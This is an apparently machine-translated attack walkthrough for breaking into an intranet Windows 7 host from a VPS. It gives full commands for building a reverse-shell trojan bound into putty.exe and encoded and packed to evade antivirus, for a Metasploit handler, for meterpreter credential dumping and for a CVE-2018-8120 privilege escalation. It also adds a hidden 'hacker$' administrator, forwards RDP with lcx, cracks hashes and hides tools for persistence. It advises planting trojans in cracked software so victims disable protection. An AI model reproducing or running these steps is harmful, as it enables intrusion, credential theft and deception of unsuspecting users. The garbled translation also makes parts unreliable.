vps penetrate intranet win7 host
centos7:22.214.171.124 (Temporary application for public network ip registration for experimentation)
Metasploit osmosis framework
Cve-2018-8120 Local Authorization Execution Document
Windows exploit sugger
Putty Execution File
Lcx (Port Forwarding Tool under windows)
Portmap (Port Forwarding Tool under linux)
Saminside (crack system user password)
centos7 installation metasploit
apt-get install curl,wget curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall //Grant execution privileges to msfinstall ./msfinstall //After successful installation, run the subordinate code to connect the latest version of msf downloaded to the database. adduser msf //Add msf user, here will be prompted to enter the password for the new account su msf //Switch user to msf ./msfconsole
Generate a Trojan horse and bind the program (you can also use shellter to bind the Trojan horse to the program for personal habits):
msfvenom -p windows/shell_reverse_tcp LHOST=126.96.36.199 LPORT=8001 -e x86/shikata_ga_nai -x putty.exe -k -i 5 -f exe -o backdoor.exe msfvenom -p windows/shell_reverse_tcp Intended to use shell_reverse_tcp Attack Load LHOST=188.8.131.52 This step is to set up an attacker IP address LPORT=8001 This step is to set up a Trojan that will actively connect to the listening port set by the attacker -e x86/shikata_ga_nai This step means to use shikata_ga_nai The encoding method for the attack payload is re-coded to avoid killing by re-coding -x putty.exe This step means to bundle a Trojan horse to the specified executable template, where putty.exe -i 5 This means to code the target five times using the encoding method just set. (Multiple encoding theoretically helps to avoid killing, but it is not necessarily because killing is not free of charge after all. With the rapid development of killing-free technology, new killing-free technology will be targeted by major security manufacturers as soon as it appears.) -f exe This step means specifying MSF Encoder output format is exe -o backdoor.exe This step means specifying the file output path after processing is complete
Use kali's upx to shell the Trojan horse program to bypass kill
upx -5 backdoor.exe
Shell successfully, scan.
Interruption, nothing, Trojan killing operations down to study.
Another way of thinking is to bind the Trojan to the cracking software, because the download execution of cracking software on the Internet will generally advise users to close the protective wall, and use this social worker idea to achieve the target of the Trojan to be downloaded and executed.(Trojan horse needs to be renamed to normal name, e.g. putty green version.exe, after all backdoor, shell and so on are too brain-damaged, people will know at a glance that there is a problem with this execution file.)
[root@vultr ~]# msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set LHOST LHOST => 184.108.40.206 msf5 exploit(multi/handler) > set LPORT 8001 LPORT => 8001 msf5 exploit(multi/handler) > run
Target machine executes Trojan file, vps gets meterpreter shell
meterpreter > getuid //View current user meterpreter > sysinfo //View system information meterpreter > ps //View system processes meterpreter > netstat -ano //View System Open Ports meterpreter > shell //Get an interactive shell meterpreter >run hashdump //Get user password hash meterpreter >load mimikatz //Loading mimikatz meterpreter >Kerberos //Get User Clear Text Password
Insufficient permissions to obtain user password or hash value.
meterpreter > shell //Get an interactive shell C:\Users\wwb\Desktop>systeminfo >systeminfo.txt //Generate system configuration information file for systeminfo.txt in current directory
meterpreter >download c:\\Users\\wwb\\Desktop\\systeminfo.txt //Download systeminfo.txt back to local
python wes.py --update //Microsoft Official Download Vulnerability Library python wes.py -e systeminfo.txt >result.txt //Compare patches to obtain available vulnerability information and store it in result.txt in the current file
Check result.txt to select exploit vulnerability.
Find the arsenal, there are cve-2018-8120 local enforcement procedures. Meterpreter > upload/root/CVE-2018-8120.exe c:\Users\wb\Desktop //Upload to the desktop directory of the target host meterpreter > shell C:UserswwbDesktop>cve-2018-8120.exe "whoami" //Title
C:\Users\wwb\Desktop>cve-2018-8120.exe "net user hacker$ hacker /add" //Add hacker$Hide user, password is hacker C:\Users\wwb\Desktop>cve-2018-8120.exe "net localgroup administrators hacker$ /add" //Add hacker$to Management Group
upload lcx.exe To target file: meterpreter > upload /root/lcx.exe c:\\Users\\wwb\\Desktop //Upload to target host desktop directory meterpreter >shell C:\Users\wwb\Desktop>netstat -ano //View open ports C:\Users\wwb\Desktop>lcx -slave 220.127.116.11 55 127.0.0.1 3389 //Map port 3389 to public network port 55 [root@vultr ~]# . /portmap-m 2-p1 55-p2 56 //listen on port 55 and forward to port 56
Remote service is on:
vps opens a new terminal execution port for listening and forwarding:
Because vps does not have Desktop Services installed, another win10 host is used to connect to the target host remotely.
Open the remote desktop connection and set the drive (Remote Desktop Connection - Local Resources - Details), log in to the hacker $account remotely, and upload Samin (instead of using meterpreter's upload upload).However, in the real environment, do not allow the real host to interact with the target host in traffic. In the middle, many vps will be used to transfer to hide their own effect.)
Execute Samin as an administrator
The password is too complex to be understood and needs external assistance.
Online cracking system password hash
Get Administrator Account Password: wwb/asd123
Log in remotely using the original administrator account.
When deleting lcx, deletion was found because we need to map port 3389 of the target to vps with this executable file. For this continually used executable, find a folder to hide it.
Continuous updates and improvements,,,